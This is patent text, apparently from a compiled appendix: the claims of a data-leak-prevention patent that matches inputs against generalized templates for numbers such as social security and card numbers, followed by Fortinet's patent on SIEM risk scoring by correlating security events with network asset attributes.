As shown, computer system **700** includes a bus **730**, a processor **705**, communication port **710**, a main memory **715**, a removable storage media **740**, a read only memory **720** and a mass storage **725**. A person skilled in the art will appreciate that computer system **700** may include more than one processor and communication ports.

Examples of processor **705** include, but are not limited to, an Intel® Itanium® or Itanium 2 processor(s), or AMD® Opteron® or Athlon MP® processor(s), Motorola® lines of processors, FortiSOC™ system on a chip processors or other future processors. Processor **705** may include various modules associated with embodiments of the present invention.

Communication port **710** can be any of an RS-232 port for use with a modem based dialup connection, a 10/100 Ethernet port, a Gigabit or 10 Gigabit port using copper or fiber, a serial port, a parallel port, or other existing or future ports. Communication port **710** may be chosen depending on a network, such a Local Area Network (LAN), Wide Area Network (WAN), or any network to which computer system **700** connects.

Memory **715** can be Random Access Memory (RAM), or any other dynamic storage device commonly known in the art. Read only memory **720** can be any static storage device(s) such as, but not limited to, a Programmable Read Only Memory (PROM) chips for storing static information such as start-up or BIOS instructions for processor **705**.

Mass storage **725** may be any current or future mass storage solution, which can be used to store information and/or instructions. Exemplary mass storage solutions include, but are not limited to, Parallel Advanced Technology Attachment (PATA) or Serial Advanced Technology Attachment (SATA) hard disk drives or solid-state drives (internal or external, e.g., having Universal Serial Bus (USB) and/or Firewire interfaces), such as those available from Seagate (e.g., the Seagate Barracuda 7200 family) or Hitachi (e.g., the Hitachi Deskstar 7K1000), one or more optical discs, Redundant Array of Independent Disks (RAID) storage, such as an array of disks (e.g., SATA arrays), available from various vendors including Dot Hill Systems Corp., LaCie, Nexsan Technologies, Inc. and Enhance Technology, Inc.

Bus **730** communicatively couples processor(s) **705** with the other memory, storage and communication blocks. Bus **730** can be, such as a Peripheral Component Interconnect (PCI)/PCI Extended (PCI-X) bus, Small Computer System Interface (SCSI), USB or the like, for connecting expansion cards, drives and other subsystems as well as other buses, such a front side bus (FSB), which connects processor **705** to system memory.

Optionally, operator and administrative interfaces, such as a display, keyboard, and a cursor control device, may also be coupled to bus **730** to support direct operator interaction with computer system **700**. Other operator and administrative interfaces can be provided through network connections connected through communication port **710**.

Removable storage media **740** can be any kind of external hard-drives, floppy drives, IOMEGA® Zip Drives, Compact Disc—Read Only Memory (CD-ROM), Compact Disc—Re-Writable (CD-RW), Digital Video Disk—Read Only Memory (DVD-ROM).

Components described above are meant only to exemplify various possibilities. In no way should the aforementioned exemplary computer system limit the scope of the present disclosure.

As used herein, and unless the context dictates otherwise, the term "coupled to" is intended to include both direct coupling (in which two elements that are coupled to each other contact each other) and indirect coupling (in which at least one additional element is located between the two elements). Therefore, the terms "coupled to" and "coupled with" are used synonymously. Within the context of this document terms "coupled to" and "coupled with" are also used euphemistically to mean "communicatively coupled with" over a network, where two or more devices are able to exchange data with each other over the network, possibly via one or more intermediary device.



It should be apparent to those skilled in the art that many more modifications besides those already described are possible without departing from the inventive concepts herein. The inventive subject matter, therefore, is not to be restricted except in the spirit of the appended claims. Moreover, in interpreting both the specification and the claims, all terms should be interpreted in the broadest possible manner consistent with the context. In particular, the terms "comprises" and "comprising" should be interpreted as referring to elements, components, or steps in a non-exclusive manner, indicating that the referenced elements, components, or steps may be present, or utilized, or combined with other elements, components, or steps that are not expressly referenced. Where the specification claims refers to at least one of something selected from the group consisting of A, B, C . . . and N, the text should be interpreted as requiring only one element from the group, not A plus N, or B plus N, etc. The foregoing description of the specific embodiments will so fully reveal the general nature of the embodiments herein that others can, by applying current knowledge, readily modify and/or adapt for various applications such specific embodiments without departing from the generic concept, and, therefore, such adaptations and modifications should and are intended to be comprehended within the meaning and range of equivalents of the disclosed embodiments. It is to be understood that the phraseology or terminology employed herein is for the purpose of description and not of limitation. Therefore, while the embodiments herein have been described in terms of preferred embodiments, those skilled in the art will recognize that the embodiments herein can be practiced with modification within the spirit and scope of the appended claims.

While embodiments of the present disclosure have been illustrated and described, it will be clear that the disclosure is not limited to these embodiments only. Numerous modifications, changes, variations, substitutions, and equivalents will be apparent to those skilled in the art, without departing from the spirit and scope of the disclosure, as described in the claims.

What is claimed is:

**1**. A method of preventing data leakage comprising:

avoiding inefficiencies of regular expression pattern matching by maintaining, by a Data Leak Prevention (DLP) module running on a computer system, a plurality of target strings, wherein each of the plurality of target strings represent a generalized form of a type of potential sensitive data to be detected, including a plurality of defined-length groupings of characters from one or more of a plurality of class definitions potentially separated by whitespace or one or more symbols, wherein the plurality of class definitions include a digit class, representing numbers '0' through '9', and a letter class, representing all or a subset of letters 'a' through 'z' and 'A' through 'Z';

receiving, by the DLP module, an input string that is to be checked for existence of potential sensitive data;

facilitating matching of the input string against multiple of the plurality of target strings in parallel by converting, by the DLP module, the input string into a fixed string pattern including (i) one or more groups of consecutive sequences of characters within the input string that are associated with a common class definition of the plurality of class definitions and (ii) optional

separators between the one or more groups in a form of whitespace or one or more symbols;

determining, by the DLP module, whether the input string contains the potential sensitive data to which a full-match is to be applied by matching the fixed string pattern against one or more of the plurality of target strings; and

when the full-match results in an affirmative determination that the input string contains the potential sensitive data, then preventing, by the DLP module, dissemination of the potential sensitive data.

**2**. The method of claim **1**, wherein said converting, by the DLP module, the input string into a fixed string pattern comprises:

sequentially processing each character within the input string, including:

when at least two consecutive characters are identified that are associated with a class definition of the plurality of class definitions, replacing a first character of the at least two consecutive characters with a first replacement character within the class definition and replacing a second character of the at least two consecutive characters with a second replacement character within the class definition, wherein the second replacement character comprises a character sequentially following the first replacement character within the class definition;

when an isolated character is identified that is associated with the class definition and the isolated character is not part of a group of multiple consecutive characters associated with the class definition, replacing the isolated character with a single replacement character from the class definition; and

when the character represents whitespace or a symbol, skipping the character or replacing the character with a corresponding predefined symbol.

**3**. The method of claim **2**, wherein the type of potential sensitive data to be detected comprises a social security number and wherein the generalized form comprises $D_1D_2D_3$-$D_1D_2$-$D_1D_2D_3D_4$ or $D_1D_2D_3$ $D_1D_2$ $D_1D_2D_3D_4$;

wherein $D_1$ comprises a first replacement character from the digit class;

wherein $D_2$ comprises a second replacement character from the digit class that sequentially follows the first replacement character in the digit class;

wherein $D_3$ comprises a third replacement character from the digit class that sequentially follows the second replacement character in the digit class; and

wherein $D_4$ comprises a forth replacement character from the digit class that sequentially follows the third replacement character in the digit class.

**4**. The method of claim **2**, wherein the type of potential sensitive data to be detected comprises a social security number and wherein the generalized form comprises:

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;

012 01 01234;

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; or

123 12 1234.

**5**. The method of claim **2**, wherein the type of potential sensitive data to be detected comprises a telephone number and wherein the generalized form comprises $(D_1D_2D_3)$ $D_1D_2D_3D$-$D_1D_2D_3D_4$, $D_1D_2D_3$.$D_1D_2D_3$.$D_1D_2D_3D_4$ or $D_1D_2D_3$-$D_1D_2D_3$-$D_1D_2D_3D_4$;

wherein $D_1$ comprises a first replacement character from the digit class;

wherein $D_2$ comprises a second replacement character from the digit class that sequentially follows the first replacement character in the digit class;

wherein $D_3$ comprises a third replacement character from the digit class that sequentially follows the second replacement character in the digit class; and

wherein $D_4$ comprises a forth replacement character from the digit class that sequentially follows the third replacement character in the digit class.

**6**. The method of claim **2**, wherein the type of potential sensitive data to be detected comprises a telephone number and wherein the generalized form comprises:

(012)012-0123;

012.012.0123;

012-012-0123;

(123)123-1234;

123.123.1234; or

123-123-1234.

**7**. The method of claim **2**, wherein the type of potential sensitive data to be detected comprises a date of birth and wherein the generalized form comprises $D_1D_2$/$D_1D_2$/$D_1D_2D_3D_4$ or $D_1D_2$-$D_1D_2$-$D_1D_2D_3D_4$;

wherein $D_1$ comprises a first replacement character from the digit class;

wherein $D_2$ comprises a second replacement character from the digit class that sequentially follows the first replacement character in the digit class;

wherein $D_3$ comprises a third replacement character from the digit class that sequentially follows the second replacement character in the digit class; and

wherein $D_4$ comprises a forth replacement character from the digit class that sequentially follows the third replacement character in the digit class.

**8**. The method of claim **2**, wherein the type of potential sensitive data to be detected comprises a date of birth and wherein the generalized form comprises:

01/01/0123;

01-01-0123;

12/12/1234; or

12-12-1234.

**9**. The method of claim **2**, wherein the type of potential sensitive data to be detected comprises a credit card number and wherein the generalized form comprises $D_1D_2D_3D_4$-$D_1D_2D_3D_4D_5D_6$-$D_1D_2D_3D_4D_5$, $D_1D_2D_3D_4$ $D_1D_2D_3D_4D_5D_6$ $D_1D_2D_3D_4D_5$, $D_1D_2D_3D_4$-$D_1D_2D_3D_4$-$D_1D_2D_3D_4$ or $D_1D_2D_3D_4$ $D_1D_2D_3D_4$ $D_1D_2D_3D_4$;

wherein $D_1$ comprises a first replacement character from the digit class;

wherein $D_2$ comprises a second replacement character from the digit class that sequentially follows the first replacement character in the digit class;

wherein $D_3$ comprises a third replacement character from the digit class that sequentially follows the second replacement character in the digit class;

wherein $D_4$ comprises a forth replacement character from the digit class that sequentially follows the third replacement character in the digit class;

wherein $D_5$ comprises a fifth replacement character from the digit class that sequentially follows the forth replacement character in the digit class; and

wherein $D_6$ comprises a sixth replacement character from the digit class that sequentially follows the fifth replacement character in the digit class.

**10**. The method of claim **2**, wherein the type of potential sensitive data to be detected comprises a credit card number or a bank account number and wherein the generalized form comprises:

0123-012345-01234;
0123 012345 01234;
0123-0123-0123-0123;
0123 0123 0123 0123;
1234-123456-12345;
1234 123456 12345;
1234-1234-1234-1234; or
1234 1234 1234 1234.

**11**. A non-transitory computer-readable storage medium embodying a set of instructions, which when executed by one or more processors of a computer system, cause the one or more processors to perform a method of preventing data leakage, the method comprising:

avoiding inefficiencies of regular expression pattern matching by maintaining a plurality of target strings, wherein each of the plurality of target strings represent a generalized form of a type of potential sensitive data to be detected, including a plurality of defined-length groupings of characters from one or more of a plurality of class definitions potentially separated by whitespace or one or more symbols, wherein the plurality of class definitions include a digit class, representing numbers '0' through '9', and a letter class, representing all or a subset of letters 'a' through 'z' and 'A' through 'Z';

receiving an input string that is to be checked for existence of potential sensitive data;

facilitating matching of the input string against multiple of the plurality of target strings in parallel by converting the input string into a fixed string pattern including (i) one or more groups of consecutive sequences of characters within the input string that are associated with a common class definition of the plurality of class definitions and (ii) optional separators between the one or more groups in a form of whitespace or one or more symbols;

determining whether the input string contains the potential sensitive data to which a full-match is to be applied by matching the fixed string pattern against one or more of the plurality of target strings; and

when the full-match results in an affirmative determination that the input string contains the potential sensitive data, then preventing dissemination of the potential sensitive data.

**12**. The non-transitory computer-readable storage medium of claim **11**, wherein said converting, by the DLP module, the input string into a fixed string pattern comprises:

sequentially processing each character within the input string, including:

when at least two consecutive characters are identified that are associated with a class definition of the plurality of class definitions, replacing a first character of the at least two consecutive characters with a first replacement character within the class definition and replacing a second character of the at least two consecutive characters with a second replacement character within the class definition, wherein the second replacement character comprises a character sequentially following the first replacement character within the class definition;

when an isolated character is identified that is associated with the class definition and the isolated character is not part of a group of multiple consecutive characters associated with the class definition, replacing the isolated character with a single replacement character from the class definition; and



when the character represents whitespace or a symbol, skipping the character or replacing the character with a corresponding predefined symbol.

**13**. The non-transitory computer-readable storage medium of claim **12**, wherein the type of potential sensitive data to be detected comprises a social security number and wherein the generalized form comprises $D_1D_2D_3$-$D_1D_2$-$D_1D_2D_3D_4$ or $D_1D_2D_3$ $D_1D_2$ $D_1D_2D_3D_4$;

wherein $D_1$ comprises a first replacement character from the digit class;

wherein $D_2$ comprises a second replacement character from the digit class that sequentially follows the first replacement character in the digit class;

wherein $D_3$ comprises a third replacement character from the digit class that sequentially follows the second replacement character in the digit class; and

wherein $D_4$ comprises a forth replacement character from the digit class that sequentially follows the third replacement character in the digit class.

**14**. The non-transitory computer-readable storage medium of claim **12**, wherein the type of potential sensitive data to be detected comprises a social security number and wherein the generalized form comprises:

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;
012 01 01234;
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; or
123 12 1234.

**15**. The non-transitory computer-readable storage medium of claim **12**, wherein the type of potential sensitive data to be detected comprises a telephone number and wherein the generalized form comprises $(D_1D_2D_3)$ $D_1D_2D_3$D-$D_1D_2D_3D_4$, $D_1D_2D_3$.$D_1D_2D_3$.$D_1D_2D_3D_4$ or $D_1D_2D_3$-$D_1D_2D_3$-$D_1D_2D_3D_4$;

wherein $D_1$ comprises a first replacement character from the digit class;

wherein $D_2$ comprises a second replacement character from the digit class that sequentially follows the first replacement character in the digit class;

wherein $D_3$ comprises a third replacement character from the digit class that sequentially follows the second replacement character in the digit class; and

wherein $D_4$ comprises a forth replacement character from the digit class that sequentially follows the third replacement character in the digit class.

**16**. The non-transitory computer-readable storage medium of claim **12**, wherein the type of potential sensitive data to be detected comprises a telephone number and wherein the generalized form comprises:

(012)012-0123;
012.012.0123;
012-012-0123;
(123)123-1234;
123.123.1234; or
123-123-1234.

**17**. The non-transitory computer-readable storage medium of claim **12**, wherein the type of potential sensitive data to be detected comprises a date of birth and wherein the generalized form comprises $D_1D_2$/$D_1D_2$/$D_1D_2D_3D_4$ or $D_1D_2$-$D_1D_2$-$D_1D_2D_3D_4$;

wherein $D_1$ comprises a first replacement character from the digit class;

wherein $D_2$ comprises a second replacement character from the digit class that sequentially follows the first replacement character in the digit class;

wherein $D_3$ comprises a third replacement character from the digit class that sequentially follows the second replacement character in the digit class; and

wherein $D_4$ comprises a forth replacement character from the digit class that sequentially follows the third replacement character in the digit class.

**18**. The non-transitory computer-readable storage medium of claim **12**, wherein the type of potential sensitive data to be detected comprises a date of birth and wherein the generalized form comprises:

01/01/0123;
01-01-0123;
12/12/1234; or
12-12-1234.

**19**. The non-transitory computer-readable storage medium of claim **12**, wherein the type of potential sensitive data to be detected comprises a credit card number and wherein the generalized form comprises $D_1D_2D_3D_4$-$D_1D_2D_3D_4D_5D_6$-$D_1D_2D_3D_4D_5$, $D_1D_2D_3D_4$ $D_1D_2D_3D_4D_5D_6$ $D_1D_2D_3D_4D_5$, $D_1D_2D_3D_4$-$D_1D_2D_3D_4$-$D_1D_2D_3D_4$ or $D_1D_2D_3D_4$ $D_1D_2D_3D_4$ $D_1D_2D_3D_4$;

wherein $D_1$ comprises a first replacement character from the digit class;

wherein $D_2$ comprises a second replacement character from the digit class that sequentially follows the first replacement character in the digit class;

wherein $D_3$ comprises a third replacement character from the digit class that sequentially follows the second replacement character in the digit class;

wherein $D_4$ comprises a forth replacement character from the digit class that sequentially follows the third replacement character in the digit class;

wherein $D_5$ comprises a fifth replacement character from the digit class that sequentially follows the forth replacement character in the digit class; and

wherein $D_6$ comprises a sixth replacement character from the digit class that sequentially follows the fifth replacement character in the digit class.

**20**. The non-transitory computer-readable storage medium of claim **12**, wherein the type of potential sensitive data to be detected comprises a credit card number or a bank account number and wherein the generalized form comprises:

0123-012345-01234;
0123 012345 01234;
0123-0123-0123-0123;
0123 0123 0123 0123;
1234-123456-12345;
1234 123456 12345;
1234-1234-1234-1234; or
1234 1234 1234 1234.

**21**. The non-transitory computer-readable storage medium of claim **11**, wherein the set of instructions are part of a host-based DLP module and wherein the computer system comprises a client computing system.

**22**. The non-transitory computer-readable storage medium of claim **11**, wherein the set of instructions are part of a network-based DLP module and wherein the computer system comprises a network security device.

* * * * *

# APPENDIX H

US010616258B2

(12) United States Patent
Liang

(10) Patent No.: US 10,616,258 B2
(45) Date of Patent: Apr. 7, 2020

(54) **SECURITY INFORMATION AND EVENT MANAGEMENT**

(71) Applicant: **Fortinet, Inc.**, Sunnyvale, CA (US)

(72) Inventor: **Dong Liang**, Beijing (CN)

(73) Assignee: **Fortinet, Inc.**, Sunnyvale, CA (US)

( * ) Notice: Subject to any disclaimer, the term of this patent is extended or adjusted under 35 U.S.C. 154(b) by 676 days.

(21) Appl. No.: **14/052,713**

(22) Filed: **Oct. 12, 2013**

(65) **Prior Publication Data**

US 2015/0106867 A1 Apr. 16, 2015

(51) **Int. Cl.**
***H04L 29/06*** (2006.01)

(52) **U.S. Cl.**
CPC .......... ***H04L 63/1433*** (2013.01); *H04L 63/20* (2013.01)

(58) **Field of Classification Search**
CPC ...... G06F 21/552; G06F 21/554; G06F 21/50; G06F 2201/86; H04L 63/1416; H04L 63/1408; H04L 63/1425
See application file for complete search history.

(56) **References Cited**

U.S. PATENT DOCUMENTS

7,472,422 B1 * 12/2008 Agbabian .................... 726/25
8,272,061 B1 * 9/2012 Lotem et al. .................. 726/25
8,407,798 B1 * 3/2013 Lotem et al. .................. 726/25
8,739,290 B1 * 5/2014 Jamail et al. .................. 726/25
2006/0031938 A1 * 2/2006 Choi .................... G06F 21/552 726/25
2006/0265324 A1 * 11/2006 Leclerc et al. .................. 705/38
2008/0016569 A1 * 1/2008 Hammer et al. ................ 726/23
2008/0034424 A1 * 2/2008 Overcash et al. ............. 726/22
2011/0138471 A1 * 6/2011 Van De Weyer et al. ...... 726/25
2011/0270752 A1 * 11/2011 Neto et al. ...................... 705/44
2012/0224057 A1 * 9/2012 Gill et al. ..................... 348/143
2012/0254416 A1 * 10/2012 Fake et al. .................... 709/224
2012/0304300 A1 * 11/2012 LaBumbard .......... G06F 21/577 726/25
2013/0097709 A1 * 4/2013 Basavapatna et al. ......... 726/25
2013/0298244 A1 * 11/2013 Kumar et al. ................. 726/25
2013/0307682 A1 * 11/2013 Jerhotova et al. ............ 340/521
2013/0312101 A1 * 11/2013 Lotem .................... G06F 21/55 726/25
2014/0007238 A1 * 1/2014 Magee et al. .................. 726/24
2015/0213272 A1 * 7/2015 Shezaf ................. G06F 21/577 726/25

* cited by examiner

*Primary Examiner* — Techane Gergiso
(74) *Attorney, Agent, or Firm* — Jaffrey Watson Mendonsa & Hamilton, LLP

(57) **ABSTRACT**

Systems and methods for conducting correlation analysis for security events with assets attributes of a network by a SIEM device to enable more efficient reporting are provided. According to one embodiment, when a SIEM device obtains a security event, a risk level of the security event is calculated based on at least a correlation of the security event with one or more asset attributes of a network that is managed by the SIEM device. When the risk level meets a predetermined or configurable threshold, the SIEM device causes the security event to be reported to an administrator of the network.

**15 Claims, 10 Drawing Sheets**




100
Branch Office Network 121
Branch Office Network 122
Branch Office Network 123
Branch Office Network 124
Internet 130
Headquarters Network 110
Firewall 112
Local Server 111a
PC 111b
Laptop 111c
SIEM Device 113
Vulnerability Scanner 114

FIG. 1


SIEM Device 200
Event Collector 210
Event DB 220
Correlation Engine 230
Warning/Reporting Engine 240

FIG. 2


Correlation Engine 300
Logical Correlation Engine 301
Asset Correlation Engine 302
Asset Table 303
Inventory Correlation Engine 304
Inventory Table 305
Cross Correlation Engine 306
Vulnerability ID DB 307
Knowledge Correlation Engine 308
Knowledge DB 309
Correlation Policy DB 310

FIG. 3


Start
401
Receive original events from sources
402
Conduct logical correlation to the original events
403
Extract a security event from the original events
404
Estimate a risk level of the security event based on correlation of the security event with asset attributes
405
Report the risk level of the security event
End

FIG. 4


Start
501
Obtain a correlation policy
502
Calculate a risk level of a security event based on asset correlation
503
Adjust the risk level of the security event based on inventory correlation
504
Adjust the risk level of the security event based on cross correlation
505
Adjust the risk level of the security event based on knowledge correlation
End

FIG. 5



Start
601
Set up an asset table that describes assets contained in the network
602
Set up an asset value for each asset
603
Extract the target of the security event
604
Target of the security event mapped with an asset?
No
Yes
606
Extract the asset value of the mapped asset
605
Risk level of the security event is set to low
607
Set risk level of the security event based on the asset value
End


FIG. 6


Start
701
Set up an inventory list for each asset of the network
702
Set up a reliability value for each attribute in the inventory list
703
Extract an attribute of the security event
704
An attribute of the security event is found in the inventory list?
No
Yes
706
Extract the reliability value of the attribute
705
decreasing the risk level of the security event
707
Adjust the risk level of the security event based on the reliability value
End

FIG. 7


Start
801
Match a system vulnerability based on vulnerability DB
802
Invoke multiple inspection tools to scan the target asset
803
System vulnerability is found at the target?
No
Yes
805
Increase the risk level of the security event
804
Decrease the risk level of the security event
End

FIG. 8


Start
901
Matching a system vulnerability based on knowledge DB
902
Invoke multiple inspection tools to scan the target asset
903
System vulnerability is found at the target?
No
905
Yes
Increase the risk level of the security event
904
Decrease the risk level of the security event
End

FIG. 9


1000
Mass Storage Device 1025
Read-Only Memory 1020
Main Memory 1015
Bus 1030
Processor 1005
Communication Port(s) 1010
External Storage Device 1040

FIG. 10

# SECURITY INFORMATION AND EVENT MANAGEMENT

## COPYRIGHT NOTICE

Contained herein is material that is subject to copyright protection. The copyright owner has no objection to the facsimile reproduction of the patent disclosure by any person as it appears in the Patent and Trademark Office patent files or records, but otherwise reserves all rights to the copyright whatsoever. Copyright © 2013, Fortinet, Inc.

## BACKGROUND

Field

Embodiments of the present invention generally relate to the field of network security techniques. In particular, various embodiments relate to security information and event management (SIEM) based on asset attributes of a network.

Description of the Related Art

A large computer network may comprise hundreds of client computers, servers and other network devices that may be located at different places. Multiple security devices, including, but not limited to firewalls, antivirus devices, Intrusion Prevention System (IPS) devices or Unified Threat Management (UTM) devices, can be deployed to regulate network access and protect the network from attacks. The security devices may use log files to track important network activities they capture. When the administrator of a large computer network wants to know the status of the whole network, a SIEM device may be deployed to collect all the logs from the multiple security devices. The SIEM device may send out an alarm to the administrator when a high risk event is received. The SIEM device may also generate a report to show the status of the network, such as the number, targets and sources of attacks that have been captured within a certain period. However, when a large number of security devices are deployed in a network, a SIEM device may generate too many alarms in view of the many security events collected from the security devices. Thus, there is a need for improved SIEM devices that report only those security events deemed most important to the network administrator.

## SUMMARY

Systems and methods are described for conducting correlation analysis for security events with asset attributes of a network by a SIEM device to enable more efficient reporting. According to one embodiment, when a SIEM device obtains a security event, a risk level of the security event is calculated based on at least a correlation of the security event with one or more asset attributes of a network that is managed by the SIEM device. When the risk level meets a predetermined or configurable threshold, the SIEM device causes the security event to be reported to an administrator of the network.

Other features of embodiments of the present invention will be apparent from the accompanying drawings and from the detailed description that follows.

## BRIEF DESCRIPTION OF THE DRAWINGS

Embodiments of the present invention are illustrated by way of example, and not by way of limitation, in the figures of the accompanying drawings and in which like reference numerals refer to similar elements and in which:



FIG. **1** illustrates an exemplary network architecture in accordance with an embodiment of the present invention.

FIG. **2** illustrates exemplary functional units of a SIEM device in accordance with an embodiment of the present invention.

FIG. **3** illustrates exemplary functional units of a correlation engine in accordance with an embodiment of the present invention.

FIG. **4** is a flow diagram illustrating a method for analyzing correlations of security events in accordance with an embodiment of the present invention.

FIG. **5** is a flow diagram illustrating a combined correlation processing in accordance with an embodiment of the present invention.

FIG. **6** is a flow diagram illustrating asset correlation processing in accordance with an embodiment of the present invention.

FIG. **7** is a flow diagram illustrating inventory correlation processing in accordance with an embodiment of the present invention.

FIG. **8** is a flow diagram illustrating cross correlation processing in accordance with an embodiment of the present invention.

FIG. **9** is a flow diagram illustrating knowledge correlation processing in accordance with an embodiment of the present invention.

FIG. **10** is an exemplary computer system in which or with which embodiments of the present invention may be utilized.

## DETAILED DESCRIPTION

Systems and methods are described for conducting correlation analysis for security events with asset attributes of a network by a SIEM device to enable more efficient reporting. For example, reporting of duplicate security events may be aggregated and reporting of security events directed at the core assets may be prioritized over others. In a computer network, some computing appliances are considered core assets as they provide critical services or store sensitive information. Meanwhile, the administrator may be less concerned about other appliances within the network. The SIEM device may identify security events that relate to the core assets and filter out other less important events so that the administrator may focus on the most important security events and not be disturbed by numerous alarms of lesser importance. According to one embodiment, when a SIEM device obtains a security event, a risk level of the security event is calculated based on at least the correlation of the security event with asset attributes of the network being managed by the SIEM device. An alarm may then be sent out directly or indirectly by the SIEM device to the administrator based on the risk level of the security event.

In the following description, numerous specific details are set forth in order to provide a thorough understanding of embodiments of the present invention. It will be apparent, however, to one skilled in the art that embodiments of the present invention may be practiced without some of these specific details. In other instances, well-known structures and devices are shown in block diagram form.

Embodiments of the present invention include various steps, which will be described below. The steps may be performed by hardware components or may be embodied in machine-executable instructions, which may be used to cause a general-purpose or special-purpose processor programmed with the instructions to perform the steps. Alter-

natively, the steps may be performed by a combination of hardware, software, firmware and/or by human operators.

Embodiments of the present invention may be provided as a computer program product, which may include a machine-readable storage medium tangibly embodying thereon instructions, which may be used to program a computer (or other electronic devices) to perform a process. The machine-readable medium may include, but is not limited to, fixed (hard) drives, magnetic tape, floppy diskettes, optical disks, compact disc read-only memories (CD-ROMs), and magneto-optical disks, semiconductor memories, such as ROMs, PROMs, random access memories (RAMs), programmable read-only memories (PROMs), erasable PROMs (EPROMs), electrically erasable PROMs (EEPROMs), flash memory, magnetic or optical cards, or other type of media/machine-readable medium suitable for storing electronic instructions (e.g., computer programming code, such as software or firmware). Moreover, embodiments of the present invention may also be downloaded as one or more computer program products, wherein the program may be transferred from a remote computer to a requesting computer by way of data signals embodied in a carrier wave or other propagation medium via a communication link (e.g., a modem or network connection).

In various embodiments, the article(s) of manufacture (e.g., the computer program products) containing the computer programming code may be used by executing the code directly from the machine-readable storage medium or by copying the code from the machine-readable storage medium into another machine-readable storage medium (e.g., a hard disk, RAM, etc.) or by transmitting the code on a network for remote execution. Various methods described herein may be practiced by combining one or more machine-readable storage media containing the code according to the present invention with appropriate standard computer hardware to execute the code contained therein. An apparatus for practicing various embodiments of the present invention may involve one or more computers (or one or more processors within a single computer) and storage systems containing or having network access to computer program(s) coded in accordance with various methods described herein, and the method steps of the invention could be accomplished by modules, routines, subroutines, or subparts of a computer program product.

Notably, while embodiments of the present invention may be described using modular programming terminology, the code implementing various embodiments of the present invention is not so limited. For example, the code may reflect other programming paradigms and/or styles, including, but not limited to object-oriented programming (OOP), agent oriented programming, aspect-oriented programming, attribute-oriented programming (@OP), automatic programming, dataflow programming, declarative programming, functional programming, event-driven programming, feature oriented programming, imperative programming, semantic-oriented programming, functional programming, genetic programming, logic programming, pattern matching programming and the like.

Terminology

Brief definitions of terms used throughout this application are given below.

The phase “security device” generally refers to a hardware device or appliance configured to be coupled to a network and to provide one or more of data privacy, protection, encryption and security. The network security device can be a device providing one or more of the following features: network firewalling, Virtual Private Networking (VPN), antivirus, IPS, content filtering, data leak prevention, antispam, antispyware, logging, reputation-based protections, event correlation, network access control, vulnerability management, load balancing and traffic shaping—that can be deployed individually as a point solution or in various combinations as a UTM solution. Non-limiting examples of network security devices include proxy servers, firewalls, VPN appliances, gateways, UTM appliances and the like.

The phrase “network appliance” generally refers to a specialized or dedicated device for use on a network in virtual or physical form. Some network appliances are implemented as general-purpose computers with appropriate software configured for the particular functions to be provided by the network appliance; others include custom hardware (e.g., one or more custom Application Specific Integrated Circuits (ASICs)). Examples of functionality that may be provided by a network appliance include, but is not limited to, Layer 2/3 routing, content inspection, content filtering, firewall, traffic shaping, application control, Voice over Internet Protocol (VoIP) support, VPN, Internet Protocol (IP) security (IPSec), Secure Sockets Layer (SSL), antivirus, intrusion detection, intrusion prevention, Web content filtering, spyware prevention and anti-spam. Examples of network appliances include, but are not limited to, network gateways and network security appliances (e.g., FORTIGATE family of network security appliances and FORTICARRIER family of consolidated security appliances), messaging security appliances (e.g., FORTIMAIL family of messaging security appliances), database security and/or compliance appliances (e.g., FORTIDB database security and compliance appliance), web application firewall appliances (e.g., FORTIWEB family of web application firewall appliances), application acceleration appliances, server load balancing appliances (e.g., FORTIBALANCER family of application delivery controllers), vulnerability management appliances (e.g., FORTISCAN family of vulnerability management appliances), configuration, provisioning, update and/or management appliances (e.g., FORTIMANAGER family of management appliances), logging, analyzing and/or reporting appliances (e.g., FORTIANALYZER family of network security reporting appliances), bypass appliances (e.g., FORTIBRIDGE family of bypass appliances), Domain Name Server (DNS) appliances (e.g., FORTIDNS family of DNS appliances), wireless security appliances (e.g., FORTIWIFI family of wireless security gateways), FORIDDOS, wireless access point appliances (e.g., FORTIAP wireless access points), switches (e.g., FORTISWITCH family of switches) and IP-PBX phone system appliances (e.g., FORTIVOICE family of IP-PBX phone systems).

The terms “connected” or “coupled” and related terms are used in an operational sense and are not necessarily limited to a direct connection or coupling. Thus, for example, two devices may be coupled directly, or via one or more intermediary media or devices. As another example, devices may be coupled in such a way that information can be passed there between, while not sharing any physical connection with one another. Based on the disclosure provided herein, one of ordinary skill in the art will appreciate a variety of ways in which connection or coupling exists in accordance with the aforementioned definition.

If the specification states a component or feature “may”, “can”, “could”, or “might” be included or have a characteristic, that particular component or feature is not required to be included or have the characteristic.

FIG. **1** illustrates an exemplary network architecture in accordance with an embodiment of the present invention. The network architecture **100** shown in FIG. **1** comprises a headquarters network **110**, multiple branch office networks **121**, **122**, **123** and **124**. The headquarters network **110** and branch office networks are connected through internetworks, such as Internet **130**. Headquarters network **110** comprises multiple network appliances, such as local server **111***a*, PC **111***b*, laptop **111***c* and other computing devices that are operatively coupled to each other through a Local Area Network (LAN), wherein the LAN is then operatively coupled with firewall **112** which enable the access to Internet **130**. Firewall **112** separates the external computing environment, represented by Internet **130**, from the internal computing environment of headquarters network **110**. Firewall **112** may intercept the communication between Internet **130** and the network appliances of headquarters network **110** and scan for malware, virus or other high risk network access. The internal structures of branch office networks **121-124** are omitted as they may be the same as that of headquarters network **110**.

In the embodiment shown in FIG. **1**, SIEM device **113** is connected to headquarters network **110**. SIEM device **113** may collect security information and events from network security devices of headquarters network **110** and branch office networks **121-124**. These security devices may include, but are not limited to, firewalls, IDSs, Web application firewalls (WAFs), system or Web scanning devices, Distributed Denial of Service (DDoS) mitigation appliances, anti-spam devices, anti-spam devices that protect the networks. These security devices capture network activities, such as data packets, file accesses, streams and sessions within internal networks or between internal networks and external networks. These security devices may inspect the network activities at one or more network layers and record all or abnormal network activities in their logs. The logs may be sent to SIEM device **113** in real time or periodically by these security devices. SIEM may also call a task in vulnerability scanner **114** to perform scanning of headquarters network **110** and/or branch office networks **121-124**. Vulnerability scanner **114** may be any kind of vulnerability management devices that may be used for identifying and mitigating vulnerabilities that exist in computers or other network appliances. Although SIEM device **113** is located at headquarters network **110** as shown in FIG. **1**, it will be apparent to one skilled in the art that SIEM device **113** may located within any of the internal networks **110** or **121-124**. It is also apparent to one skilled in the art that SIEM device **113** may be a cloud-based logging service that collects logs from all internal networks. SIEM device **113** analyzes the logs from different security devices and provides an alarm to a network administrator when abnormal activity is detected. SIEM device **113** may also provide a report to the administrator regarding the status of the whole network, such as total number of attacks detected within in a particular time period and the distribution of sources and targets of the attacks.

